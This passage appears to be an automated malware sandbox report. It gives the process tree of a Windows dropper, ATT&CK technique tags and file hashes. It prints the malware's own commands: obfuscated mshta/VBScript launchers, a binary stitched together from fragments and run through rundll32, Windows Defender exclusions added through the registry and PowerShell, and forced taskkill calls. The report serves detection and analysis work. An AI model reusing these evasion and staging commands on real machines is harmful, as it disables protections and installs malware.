C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4KAPG.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4KAPG.tmp\setup_2.tmp" /SL5="$102C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri106e757f6d75.exeFri106e757f6d75.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri106e757f6d75.exeC:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri106e757f6d75.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-FLNKO.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-FLNKO.tmp\setup_2.tmp" /SL5="$202FA,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-0BUP7.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-0BUP7.tmp\postback.exe" ss16⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 4483⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5648 -ip 56481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 1004 -ip 10041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5064 -ip 50641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4668 -ip 46681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4536 -ip 45361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4448 -ip 44481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1004 -ip 10041⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4036 -ip 40361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3552 -ip 35521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5900 -ip 59001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1004 -ip 10041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5800 -ip 58001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5576 -ip 55761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 28688B772E5D46666BBF7D1EC1BFEED2 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 41D607C8A5E7D12E3BE3DEA3280419B82⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Executes dropped EXE
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D82B75DD1ADDBCBD90C74E4719C2DABE E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 4220 -ip 42201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 3768 -ip 37681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1196 -ip 11961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 5140 -ip 51401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 5092 -ip 50921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\E361.exeC:\Users\Admin\AppData\Local\Temp\E361.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E361.exeC:\Users\Admin\AppData\Local\Temp\E361.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5668 -ip 56681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1B79.exeC:\Users\Admin\AppData\Local\Temp\1B79.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1B79.exeC:\Users\Admin\AppData\Local\Temp\1B79.exe2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7424 -s 4563⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 7424 -ip 74241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 7280 -ip 72801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\3A0E.exeC:\Users\Admin\AppData\Local\Temp\3A0E.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7772 -s 2442⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\4105.exeC:\Users\Admin\AppData\Local\Temp\4105.exe1⤵
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7f970b37-40ff-46bf-9519-84580630f77f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7f970b37-40ff-46bf-9519-84580630f77f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7f970b37-40ff-46bf-9519-84580630f77f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7f970b37-40ff-46bf-9519-84580630f77f\test.bat"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\4105.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\4105.exe"C:\Users\Admin\AppData\Local\Temp\4105.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\4105.exe"C:\Users\Admin\AppData\Local\Temp\4105.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 24362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 7772 -ip 77721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\691F.exeC:\Users\Admin\AppData\Local\Temp\691F.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\7C1C.exeC:\Users\Admin\AppData\Local\Temp\7C1C.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 816 -p 2468 -ip 24681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 820 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 1556 -ip 15561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6496 -ip 64961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 872 -p 932 -ip 9321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4384 -ip 43841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 896 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 1004 -ip 10041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 764 -p 7216 -ip 72161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 848 -p 4380 -ip 43801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6548 -s 4482⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 6548 -ip 65481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
6Disabling Security Tools
4Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fri106e757f6d75.exe.logMD5
e07da89fc7e325db9d25e845e27027a8
SHA14b6a03bcdb46f325984cbbb6302ff79f33637e19
SHA25694ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf
SHA5121e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1008c7d6874.exeMD5
7b3895d03448f659e2934a8f9b0a52ae
SHA1084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
SHA256898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
SHA512dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1008c7d6874.exeMD5
7b3895d03448f659e2934a8f9b0a52ae
SHA1084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
SHA256898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
SHA512dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1015b9a4e0b.exeMD5
1b30ac88a74e6eff68433de176b3a5c3
SHA131039df81b419ae7f777672785c7bcf9e7004d04
SHA2560fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28
SHA512c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1015b9a4e0b.exeMD5
1b30ac88a74e6eff68433de176b3a5c3
SHA131039df81b419ae7f777672785c7bcf9e7004d04
SHA2560fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28
SHA512c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1018ef4aa251c026c.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1018ef4aa251c026c.exeMD5
b7f786e9b13e11ca4f861db44e9fdc68
SHA1bcc51246a662c22a7379be4d8388c2b08c3a3248
SHA256f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
SHA51253185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri1034cd265b5e0adcd.exeMD5
b4dd1caa1c9892b5710b653eb1098938
SHA1229e1b7492a6ec38d240927e5b3080dd1efadf4b
SHA2566a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
SHA5126285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri103a7805577.exeMD5
cf4029ca825cdfb5aaf5e9bb77ebb919
SHA1eb9a4185ddf39c48c6731bf7fedcba4592c67994
SHA256c5761c7d94d975a44e08caf948531b363c30e3f78d7b45a7b28bda39beb4e534
SHA512d3e31b35c49f1608dfe5ee97e96a26e4548e49325bd04408e5b15efb5f8f3a39f5abe58e9ec0ad7bf20cb13d967eec2f11634332a0a79d525521bbd9c0b5c6d1
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri103a7805577.exeMD5
cf4029ca825cdfb5aaf5e9bb77ebb919
SHA1eb9a4185ddf39c48c6731bf7fedcba4592c67994
SHA256c5761c7d94d975a44e08caf948531b363c30e3f78d7b45a7b28bda39beb4e534
SHA512d3e31b35c49f1608dfe5ee97e96a26e4548e49325bd04408e5b15efb5f8f3a39f5abe58e9ec0ad7bf20cb13d967eec2f11634332a0a79d525521bbd9c0b5c6d1
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri105268dda3.exeMD5
5ce20e8fc69de75848f34beb5522a676
SHA19552dcc7ef39e2174ab18b856c4c145bfac0c6c3
SHA25607fd0812403fa09004fd4d595fdd8b680fb5707644b140909fd2e0bf54d6ea56
SHA512835c302805cb4f68b0a77c274cdbcab7910635679e183d84065fa35569d7db60dc8989b2f3564949d3213e2425481d9242be35691e9b45ccd96274ec481f76ea
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri105268dda3.exeMD5
5ce20e8fc69de75848f34beb5522a676
SHA19552dcc7ef39e2174ab18b856c4c145bfac0c6c3
SHA25607fd0812403fa09004fd4d595fdd8b680fb5707644b140909fd2e0bf54d6ea56
SHA512835c302805cb4f68b0a77c274cdbcab7910635679e183d84065fa35569d7db60dc8989b2f3564949d3213e2425481d9242be35691e9b45ccd96274ec481f76ea
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10584c049c7f.exeMD5
118cf2a718ebcf02996fa9ec92966386
SHA1f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA2567047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10584c049c7f.exeMD5
118cf2a718ebcf02996fa9ec92966386
SHA1f0214ecdcb536fe5cce74f405a698c1f8b2f2325
SHA2567047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
SHA512fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri106e757f6d75.exeMD5
09aafd22d1ba00e6592f5c7ea87d403c
SHA1b4208466b9391b587533fe7973400f6be66422f3
SHA256da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4
SHA512455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri106e757f6d75.exeMD5
09aafd22d1ba00e6592f5c7ea87d403c
SHA1b4208466b9391b587533fe7973400f6be66422f3
SHA256da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4
SHA512455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri106e757f6d75.exeMD5
09aafd22d1ba00e6592f5c7ea87d403c
SHA1b4208466b9391b587533fe7973400f6be66422f3
SHA256da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4
SHA512455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd
-
C:\Users\Admin\AppData\Local\Temp\7zS80EC7E80\Fri10720d229511df563.exeMD5
1c726db19ead14c4e11f76cc532e6a56
SHA1e48e01511252da1c61352e6c0a57bfd152d0e82d
SHA25693b5f54f94405535eefa0e95060c30ce770d91dc4c53b8aeced132e087d5abf7
